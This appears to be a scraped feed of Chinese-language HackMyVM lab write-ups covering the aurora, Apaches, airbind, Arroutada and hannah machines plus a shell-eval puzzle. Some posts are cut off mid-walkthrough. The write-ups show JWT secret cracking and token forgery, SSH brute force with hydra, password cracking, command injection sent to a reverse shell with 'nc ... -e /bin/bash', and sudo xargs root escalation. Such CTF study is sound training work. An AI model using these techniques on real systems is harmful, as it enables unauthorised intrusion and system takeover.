'{\'role\':\'user\',\'username\':\'xxoo\',\'password\':\'xxoo\'}' {'accessToken':'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Inh4b28iLCJyb2xlIjoidXNlciIsImlhdCI6MTczNzU5OTM0OH0.Q8Q3R6Bu_xXUKSTcrGR01y5-hB4ndX7vL1ck1H7XomA'} ``` 这很`jwt`，去尝试解码，[网站](https://jwt.io/)  将密钥爆破一下 ```bash ┌──(kali㉿kali)-[~/test] └─$ echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Inh4b28iLCJyb2xlIjoidXNlciIsImlhdCI6MTczNzU5OTM0OH0.Q8Q3R6Bu_xXUKSTcrGR01y5-hB4ndX7vL1ck1H7XomA' > hash ┌──(kali㉿kali)-[~/test] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 512/512 AVX512BW 16x]) Will run 12 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status nopassword (?) 1g 0:00:00:00 DONE (2025-01-23 10:31) 100.0g/s 4915Kp/s 4915Kc/s 4915KC/s 123456..trudy Use the '--show' option to display all of the cracked passwords reliably Session completed. ``` 改一下参数  尝试一下那个`execute` ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/execute -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzM3NTk5MzQ4fQ.L5acgyrWbMNdNDkCc5Li6oN-he1DS1Q8EyykWeLvsuk' <!DOCTYPE html> <html lang='en'> <head> <meta charset='utf-8'> <title>Error</title> </head> <body> <pre>TypeError [ERR_INVALID_ARG_TYPE]: The &quot;file&quot; argument must be of type string. Received undefined<br> &nbsp; &nbsp;at validateString (internal/validators.js:120:11)<br> &nbsp; &nbsp;at normalizeSpawnArguments (child_process.js:411:3)<br> &nbsp; &nbsp;at spawn (child_process.js:547:16)<br> &nbsp; &nbsp;at Object.execFile (child_process.js:237:17)<br> &nbsp; &nbsp;at exec (child_process.js:158:25)<br> &nbsp; &nbsp;at /opt/login-app/app.js:69:3<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/opt/login-app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at next (/opt/login-app/node_modules/express/lib/router/route.js:144:13)<br> &nbsp; &nbsp;at /opt/login-app/app.js:112:5<br> &nbsp; &nbsp;at /opt/login-app/node_modules/jsonwebtoken/verify.js:261:12</pre> </body> </html> ``` `Authorization` 头以 `Bearer` 开头。https://7r1UMPH.github.io/post/hmv_aurora.htmlThu, 20 Mar 2025 07:54:19 +0000https://7r1UMPH.github.io/post/hmv_Apaches.html# hmv_Apaches # 0. 简介 **靶机**：[hackmyvm - Apaches](https://hackmyvm.eu/machines/machine.php?vm=Apaches) **难度**：绿色 **目标 IP**：192.168.205.143 **本机 IP**：192.168.205.141 # 1. 扫描 首先，通过 `nmap` 对靶机进行全端口扫描，检查开放端口和服务： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 13:58 CST Nmap scan report for 192.168.205.143 Host is up (0.00024s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:B2:79:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) ``` 从扫描结果可以看到，靶机开启了 **SSH** 和 **HTTP** 服务。https://7r1UMPH.github.io/post/hmv_Apaches.htmlThu, 20 Mar 2025 07:52:16 +0000https://7r1UMPH.github.io/post/hmv_airbind.html# hmv_airbind **靶机**：https://hackmyvm.eu/machines/machine.php?vm=airbind **难度**：黄色 **目标 IP**：192.168.205.212 **本机** IP：192.168.205.141 --- ### **1. 端口枚举及服务探测** 首先，使用 `nmap` 扫描目标 IP 的开放端口： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.212 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 17:39 CST Nmap scan report for 192.168.205.212 Host is up (0.00029s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.57 ((Ubuntu)) MAC Address: 08:00:27:AD:E1:D7 (Oracle VirtualBox virtual NIC) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=12/29%OT=80%CT=1%CU=32430%PV=Y%DS=1%DC=D%G=Y%M=0800 OS:27%TM=677118F6%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z% OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8 OS:8%W6=FE88)ECN(R=Y%DF=Y%T=3F%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=3F OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD= OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE( OS:R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds ``` 扫描结果显示目标机器开放了 22 (SSH) 和 80 (HTTP) 端口。https://7r1UMPH.github.io/post/hmv_airbind.htmlThu, 20 Mar 2025 07:51:14 +0000https://7r1UMPH.github.io/post/qun-zhu-ti.html好久没打过靶机了，也没更新过，今天在群里看到了群主发了一个题目就玩了一下，顺便水一期wp 题目：  ``` PATH=/usr/bin read INPUT < <(head -n1 | tr -d '[A-Za-z0-9/]') eval '$INPUT' ``` 浅瞄了一眼，发现tr删除了所有字母、数字和斜杠，但保留特殊符号，那就有搞头 ps:$@ 在 Shell 中表示脚本的所有参数，可被 eval 解析。https://7r1UMPH.github.io/post/qun-zhu-ti.htmlFri, 28 Feb 2025 07:38:41 +0000https://7r1UMPH.github.io/post/hmv_Arroutada.html# 0.简介 靶机：https://hackmyvm.eu/machines/machine.php?vm=Arroutada 难度：绿色 目标 IP：192.168.205.151 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.151 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 16:47 CST Nmap scan report for 192.168.205.151 Host is up (0.00024s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.54 ((Debian)) |_http-server-header: Apache/2.4.54 (Debian) |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:06:46:64 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4) Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.24 ms 192.168.205.151 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds ``` # 2.踩点 ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.151 <div align='center'><img src='imgs/apreton.png'></div> ``` 爆破目录 ``` ┌──(kali㉿kali)-[~/test] └─$ gobuster dir -u http://192.168.205.151 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,md | grep -v '403' =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.205.151 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,html,txt,md [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 59] /. (Status: 200) [Size: 59] /imgs (Status: 301) [Size: 317] [--> http://192.168.205.151/imgs/] /scout (Status: 301) [Size: 318] [--> http://192.168.205.151/scout/] Progress: 598000 / 598005 (100.00%) =============================================================== Finished =============================================================== ``` 查看/scout ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.151/scout/ <div> <p> Hi, Telly, <br> <br> I just remembered that we had a folder with some important shared documents. The problem is that I don't know wich first path it was in, but I do know the second path. Graphically represented: <br> /scout/******/docs/ <br> <br> With continued gratitude, <br> J1. </p> </div> <!-- Stop please --> ``` 爆破 ``` ┌──(kali㉿kali)-[~/test] └─$ wfuzz -u '192.168.205.151/scout/FUZZ/docs/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 --hw 28 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.205.151/scout/FUZZ/docs/ Total requests: 119600 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000021664: 200 1016 L 12059 W 189769 Ch 'j2' Total time: 59.22016 Processed Requests: 119600 Filtered Requests: 119599 Requests/sec.: 2019.582 ```  pass.txt是废话，直接下shellfile.ods，然后有密码，我们爆破一下 ``` ┌──(kali㉿kali)-[~/test] └─$ file shellfile.ods shellfile.ods: OpenDocument Spreadsheet ┌──(kali㉿kali)-[~/test] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (ODF, OpenDocument Star/Libre/OpenOffice [PBKDF2-SHA1 512/512 AVX512BW 16x BF/AES]) Cost 1 (iteration count) is 100000 for all loaded hashes Cost 2 (crypto [0=Blowfish 1=AES]) is 1 for all loaded hashes Will run 12 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status john11 (shellfile.ods) 1g 0:00:00:08 DONE (2025-02-08 16:53) 0.1177g/s 1967p/s 1967c/s 1967C/s lachina..idiot Use the '--show --format=ODF' options to display all of the cracked passwords reliably Session completed. ``` 打开给了我们一个路径/thejabasshell.php，点进去是空白的，所以我们进行爆破 ``` ┌──(kali㉿kali)-[~/test] └─$ wfuzz -u 'http://192.168.205.151/thejabasshell.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 --hw 0 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.205.151/thejabasshell.php?FUZZ=id Total requests: 119600 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000280: 200 0 L 5 W 33 Ch 'a' 000000557: 200 0 L 0 W 0 Ch 'Controls' Total time: 0 Processed Requests: 474 Filtered Requests: 473 Requests/sec.: 0 ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.151/thejabasshell.php?a=id Error: Problem with parameter 'b' ``` 还要一个b的参数 ``` ┌──(kali㉿kali)-[~/test] └─$ wfuzz -u 'http://192.168.205.151/thejabasshell.php?a=id&b=FUZZ' -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 --hw 5 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.205.151/thejabasshell.php?a=id&b=FUZZ Total requests: 119600 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000001999: 200 1 L 3 W 54 Ch 'pass' /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests... Total time: 41.29983 Processed Requests: 56690 Filtered Requests: 56689 Requests/sec.: 1372.644 ┌──(kali㉿kali)-[~/test] └─$ curl 'http://192.168.205.151/thejabasshell.php?a=id&b=pass' uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` 使用a参数弹个shell回来就好了 # 3. 获得稳定的 Shell 获取反向 shell 后，通过以下命令获得稳定的交互式 TTY shell： ```bash script /dev/null -c bash ctrl+z stty raw -echo; fg reset xterm export TERM=xterm echo $SHELL export SHELL=/bin/bash stty rows 59 cols 236 ``` # 4.提权 ``` www-data@arroutada:/var/www/html$ ls -al total 24 drwxr-xr-x 4 root root 4096 Jan 8 2023 . drwxr-xr-x 3 root root 4096 Jan 8 2023 .. drwxr-xr-x 2 root root 4096 Jan 8 2023 imgs -rw-r--r-- 1 root root 59 Jan 8 2023 index.html drwxr-xr-x 22 root root 4096 Jan 8 2023 scout -rw-r--r-- 1 root root 174 Jan 8 2023 thejabasshell.php www-data@arroutada:/var/www/html$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for www-data: sudo: a password is required www-data@arroutada:/var/www/html$ cd .. www-data@arroutada:/var/www$ ls -la total 12 drwxr-xr-x 3 root root 4096 Jan 8 2023 . drwxr-xr-x 12 root root 4096 Jan 8 2023 .. drwxr-xr-x 4 root root 4096 Jan 8 2023 html www-data@arroutada:/var/www$ cd .. www-data@arroutada:/var$ ls -al total 48 drwxr-xr-x 12 root root 4096 Jan 8 2023 . drwxr-xr-x 18 root root 4096 Jan 8 2023 .. drwxr-xr-x 2 root root 4096 Sep 3 2022 backups drwxr-xr-x 10 root root 4096 Jan 8 2023 cache drwxr-xr-x 26 root root 4096 Jan 8 2023 lib drwxrwsr-x 2 root staff 4096 Sep 3 2022 local lrwxrwxrwx 1 root root 9 Jan 8 2023 lock -> /run/lock drwxr-xr-x 8 root root 4096 Jan 8 2023 log drwxrwsr-x 2 root mail 4096 Jan 8 2023 mail drwxr-xr-x 2 root root 4096 Jan 8 2023 opt lrwxrwxrwx 1 root root 4 Jan 8 2023 run -> /run drwxr-xr-x 4 root root 4096 Jan 8 2023 spool drwxrwxrwt 2 root root 4096 Feb 8 03:46 tmp drwxr-xr-x 3 root root 4096 Jan 8 2023 www www-data@arroutada:/var$ cd /home/ www-data@arroutada:/home$ ls -al total 12 drwxr-xr-x 3 root root 4096 Jan 8 2023 . drwxr-xr-x 18 root root 4096 Jan 8 2023 .. drwxr-x--- 3 drito drito 4096 Jan 10 2023 drito www-data@arroutada:/home$ cd /opt/ www-data@arroutada:/opt$ ls -al total 8 drwxr-xr-x 2 root root 4096 Jan 8 2023 . drwxr-xr-x 18 root root 4096 Jan 8 2023 .. www-data@arroutada:/opt$ cd /tmp/ www-data@arroutada:/tmp$ sl -al bash: sl: command not found www-data@arroutada:/tmp$ ls -al total 8 drwxrwxrwt 2 root root 4096 Feb 8 03:46 . drwxr-xr-x 18 root root 4096 Jan 8 2023 .. www-data@arroutada:/tmp$ cd / www-data@arroutada:/$ ls -la total 68 drwxr-xr-x 18 root root 4096 Jan 8 2023 . drwxr-xr-x 18 root root 4096 Jan 8 2023 .. lrwxrwxrwx 1 root root 7 Jan 8 2023 bin -> usr/bin drwxr-xr-x 3 root root 4096 Jan 8 2023 boot drwxr-xr-x 17 root root 3140 Feb 8 03:46 dev drwxr-xr-x 66 root root 4096 Feb 8 03:46 etc drwxr-xr-x 3 root root 4096 Jan 8 2023 home lrwxrwxrwx 1 root root 31 Jan 8 2023 initrd.img -> boot/initrd.img-5.10.0-20-amd64 lrwxrwxrwx 1 root root 31 Jan 8 2023 initrd.img.old -> boot/initrd.img-5.10.0-18-amd64 lrwxrwxrwx 1 root root 7 Jan 8 2023 lib -> usr/lib lrwxrwxrwx 1 root root 9 Jan 8 2023 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Jan 8 2023 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Jan 8 2023 libx32 -> usr/libx32 drwx------ 2 root root 16384 Jan 8 2023 lost+found drwxr-xr-x 3 root root 4096 Jan 8 2023 media drwxr-xr-x 2 root root 4096 Jan 8 2023 mnt drwxr-xr-x 2 root root 4096 Jan 8 2023 opt dr-xr-xr-x 150 root root 0 Feb 8 03:46 proc drwx------ 3 root root 4096 Jan 8 2023 root drwxr-xr-x 17 root root 480 Feb 8 03:46 run lrwxrwxrwx 1 root root 8 Jan 8 2023 sbin -> usr/sbin drwxr-xr-x 2 root root 4096 Jan 8 2023 srv dr-xr-xr-x 13 root root 0 Feb 8 03:46 sys drwxrwxrwt 2 root root 4096 Feb 8 03:46 tmp drwxr-xr-x 14 root root 4096 Jan 8 2023 usr drwxr-xr-x 12 root root 4096 Jan 8 2023 var lrwxrwxrwx 1 root root 28 Jan 8 2023 vmlinuz -> boot/vmlinuz-5.10.0-20-amd64 lrwxrwxrwx 1 root root 28 Jan 8 2023 vmlinuz.old -> boot/vmlinuz-5.10.0-18-amd64 www-data@arroutada:/$ find / -perm -4000 -type f 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/sudo /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/su /usr/bin/passwd /usr/bin/umount /usr/bin/mount /usr/bin/chfn /usr/bin/chsh www-data@arroutada:/$ /sbin/getcap -r / 2>/dev/null /usr/bin/ping cap_net_raw=ep www-data@arroutada:/$ ss -tnlup Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.1:8000 0.0.0.0:* tcp LISTEN 0 511 *:80 *:* ``` 有个8000端口没有公开，所以我们要转发，但是它socat少了so，那我们直接找其他的工具吧 ``` www-data@arroutada:/tmp$ curl http://127.0.0.1:5000 bash: curl: command not found www-data@arroutada:/tmp$ wget http://127.0.0.1:8000 --2025-02-08 04:00:55-- http://127.0.0.1:8000/ Connecting to 127.0.0.1:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 319 [text/html] Saving to: 'index.html' index.html 0%[ index.html 100%[========================================================================================================================================>] 319 --.-KB/s in 0s 2025-02-08 04:00:55 (116 MB/s) - 'index.html' saved [319/319] www-data@arroutada:/tmp$ ls -la total 476 drwxrwxrwt 2 root root 4096 Feb 8 04:00 . drwxr-xr-x 18 root root 4096 Jan 8 2023 .. -rw-r--r-- 1 www-data www-data 319 Feb 8 04:00 index.html -rwxr-xr-x 1 www-data www-data 473256 Jan 29 19:48 socat www-data@arroutada:/tmp$ cat index.html <h1>Service under maintenance</h1> <br> <h6>This site is from ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>---.+++++++++++..<<++.>++.>-----------.++.++++++++.<+++++.>++++++++++++++.<+++++++++.---------.<.>>-----------------.-------.++.++++++++.------.+++++++++++++.+.<<+..</h6> <!-- Please sanitize /priv.php --> ```  那我们看它提示的/priv.php ``` www-data@arroutada:/tmp$ wget http://127.0.0.1:8000/priv.php --2025-02-08 04:01:52-- http://127.0.0.1:8000/priv.php Connecting to 127.0.0.1:8000... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: 'priv.php' priv.php [<=> priv.php [ <=> ] 308 --.-KB/s in 0s 2025-02-08 04:01:52 (111 MB/s) - 'priv.php' saved [308] www-data@arroutada:/tmp$ cat priv.php Error: the 'command' parameter is not specified in the request body. /* $json = file_get_contents('php://input'); $data = json_decode($json, true); if (isset($data['command'])) { system($data['command']); } else { echo 'Error: the 'command' parameter is not specified in the request body.'; } */ ``` 说我们少了参数，我们加上就好了 ``` www-data@arroutada:/tmp$ wget --post-data='{'command':'whoami'}' http://127.0.0.1:8000/priv.php -q -O - drito /* $json = file_get_contents('php://input'); $data = json_decode($json, true); if (isset($data['command'])) { system($data['command']); } else { echo 'Error: the 'command' parameter is not specified in the request body.'; } */ ``` 利用 ``` www-data@arroutada:/tmp$ wget --post-data='{'command':'nc 192.168.205.128 8888 -e /bin/bash'}' http://127.0.0.1:8000/priv.php -q -O - ┌──(kali㉿kali)-[~/test] └─$ nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.205.128] from (UNKNOWN) [192.168.205.151] 60268 id uid=1001(drito) gid=1001(drito) groups=1001(drito) ``` 获取反向 shell 后，通过以下命令获得稳定的交互式 TTY shell： ```bash script /dev/null -c bash ctrl+z stty raw -echo; fg reset xterm export TERM=xterm echo $SHELL export SHELL=/bin/bash stty rows 59 cols 236 ``` 提权 ``` drito@arroutada:~/web$ sudo -l Matching Defaults entries for drito on arroutada: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User drito may run the following commands on arroutada: (ALL : ALL) NOPASSWD: /usr/bin/xargs ``` https://gtfobins.github.io/gtfobins/xargs/#sudo ```bash drito@arroutada:~/web$ sudo xargs -a /dev/null bash root@arroutada:/home/drito/web# id uid=0(root) gid=0(root) groups=0(root) ``` <!-- ##{'timestamp':1739012133}## -->。https://7r1UMPH.github.io/post/hmv_Arroutada.htmlSat, 08 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/hmv_hannah.html# hmv_hannah # 0.简介 **靶机**：https://hackmyvm.eu/machines/machine.php?vm=Hannah **难度**：绿色 **目标 IP**：192.168.205.150 **本机 IP**：192.168.205.128 # 1.扫描 ​`nmap`​起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.150 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 16:07 CST Nmap scan report for 192.168.205.150 Host is up (0.00031s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 5f:1c:78:36:99:05:32:09:82:d3:d5:05:4c:14:75:d1 (RSA) | 256 06:69:ef:97:9b:34:d7:f3:c7:96:60:d1:a1:ff:d8:2c (ECDSA) |_ 256 85:3d:da:74:b2:68:4e:a6:f7:e5:f5:85:40:90:2e:9a (ED25519) |_auth-owners: root 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 | http-robots.txt: 1 disallowed entry |_/enlightenment |_http-title: Site doesn't have a title (text/html). |_auth-owners: moksha 113/tcp open ident? |_auth-owners: root MAC Address: 08:00:27:7C:E4:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.31 ms 192.168.205.150 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.58 seconds ``` 113未知端口，优先查看 # 2.踩点 https://book.hacktricks.wiki/zh/network-services-pentesting/113-pentesting-ident.html#basic-information ``` ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.150:113 curl: (56) Recv failure: 连接被对方重置 ┌──(kali㉿kali)-[~/test] └─$ nc 192.168.205.150 113 hello ┌──(kali㉿kali)-[~/test] └─$ nc -vn 192.168.205.150 113 (UNKNOWN) [192.168.205.150] 113 (auth) open hello ┌──(kali㉿kali)-[~/test] └─$ ident-user-enum 192.168.205.150 80 22 113 ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum ) 192.168.205.150:80 moksha 192.168.205.150:22 root 192.168.205.150:113 root ``` 有一个moksha用户，我们尝试爆破ssh ``` ┌──(kali㉿kali)-[~/test] └─$ hydra -l moksha -P /usr/share/wordlists/q5000.txt ssh://192.168.205.150 -V -I -u -f -e nsr -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-08 16:23:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 5003 login tries (l:1/p:5003), ~79 tries per task [DATA] attacking ssh://192.168.205.150:22/ [22][ssh] host: 192.168.205.150 login: moksha password: hannah [STATUS] attack finished for 192.168.205.150 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-08 16:23:44 ``` 我第一次爆破的时候没出来，真的有点无语 ``` ┌──(kali㉿kali)-[~/test] └─$ ssh moksha@192.168.205.150 moksha@192.168.205.150's password: Linux hannah 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Jan 4 10:45:54 2023 from 192.168.1.51 moksha@hannah:~$ id uid=1000(moksha) gid=1000(moksha) grupos=1000(moksha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) ``` # 3.提权 ``` moksha@hannah:~$ sudo -l -bash: sudo: orden no encontrada moksha@hannah:~$ which sudo moksha@hannah:~$ find / -name sudo 2>/dev/null /usr/share/bash-completion/completions/sudo moksha@hannah:~$ /usr/share/bash-completion/completions/sudo -l -bash: /usr/share/bash-completion/completions/sudo: Permiso denegado moksha@hannah:~$ ls -la /usr/share/bash-completion/completions/sudo -rw-r--r-- 1 root root 1504 ago 12 2020 /usr/share/bash-completion/completions/sudo ``` 我还以为又藏sudo呢 ``` moksha@hannah:~$ ls -la total 32 drwxr-xr-x 3 moksha moksha 4096 ene 4 2023 . drwxr-xr-x 3 root root 4096 ene 4 2023 .. lrwxrwxrwx 1 moksha moksha 9 ene 4 2023 .bash_history -> /dev/null -rw-r--r-- 1 moksha moksha 220 ene 4 2023 .bash_logout -rw-r--r-- 1 moksha moksha 3526 ene 4 2023 .bashrc drwxr-xr-x 3 moksha moksha 4096 ene 4 2023 .local -rw-r--r-- 1 moksha moksha 807 ene 4 2023 .profile -rw------- 1 moksha moksha 14 ene 4 2023 user.txt -rw------- 1 moksha moksha 52 ene 4 2023 .Xauthority moksha@hannah:~$ cd .. moksha@hannah:/home$ ls -al total 12 drwxr-xr-x 3 root root 4096 ene 4 2023 . drwxr-xr-x 18 root root 4096 ene 4 2023 .. drwxr-xr-x 3 moksha moksha 4096 ene 4 2023 moksha moksha@hannah:/home$ find / -perm -4000 -type f 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/su /usr/bin/newgrp /usr/bin/passwd /usr/bin/umount /usr/bin/gpasswd /usr/bin/chsh /usr/bin/chfn /usr/bin/mount moksha@hannah:/home$ /sbin/getcap -r / 2>/dev/null /usr/bin/ping cap_net_raw=ep moksha@hannah:/home$ cat /etc/cron* cat: /etc/cron.d: Es un directorio cat: /etc/cron.daily: Es un directorio cat: /etc/cron.hourly: Es un directorio cat: /etc/cron.monthly: Es un directorio # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed * * * * * root touch /tmp/enlIghtenment 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # cat: /etc/cron.weekly: Es un directorio 